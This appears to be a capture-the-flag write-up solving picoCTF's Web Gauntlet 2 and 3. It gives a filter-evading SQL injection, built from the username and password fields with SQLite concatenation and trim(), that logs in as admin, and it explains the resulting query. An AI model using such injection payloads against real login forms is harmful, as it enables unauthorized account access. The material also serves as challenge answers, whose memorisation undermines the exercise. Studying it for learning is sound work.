# Web Gauntlet (170 + 300)

## Problem

### Web Gauntlet 2

This website looks familiar... Log in as admin

Site: <http://mercury.picoctf.net:35178/>

Filter: <http://mercury.picoctf.net:35178/filter.php>

### Web Gauntlet 3

Last time, I promise! Only 25 characters this time.

## Solution

### Web Gauntlet 2

Username: `adm' || trim('in',` Password: `) || '`

This will cause the following SQL statement to be executed:

```
SELECT username, password FROM users WHERE username='adm' || trim('in',' AND password=') || ''
```

Notes:

* `||` is the SQLite concatenation operator.
* `trim(string, character)` will remove `character` from `string`. Here, it is simply for us to ignore the `AND` condition by treating `' AND password='` as a string. Since `' AND password='` does not appear in `'in'`, `trim('in',' AND password=')` will simply return `'in'`.
* The above SQL statement is thus equivalent to:

```
SELECT username, password FROM users WHERE username='adm' || 'in' || ''
```

Which is equivalent to:

```
SELECT username, password FROM users WHERE username='admin'
```

We can now check out the filter page:

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-574deac2356d2078b422709cbd1f10846b778986%2Fcfd745ed128d4fdea484d02e74f76170.png?alt=media)

### Web Gauntlet 3

The length requirement is down from 35 characters to 25 characters. Our above solution works for this challenge as well!

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-7eb70a7c7f62fef5550b3c38b93a4199612dcb28%2F961bccf829724357b9ee05d27beec0fb.png?alt=media)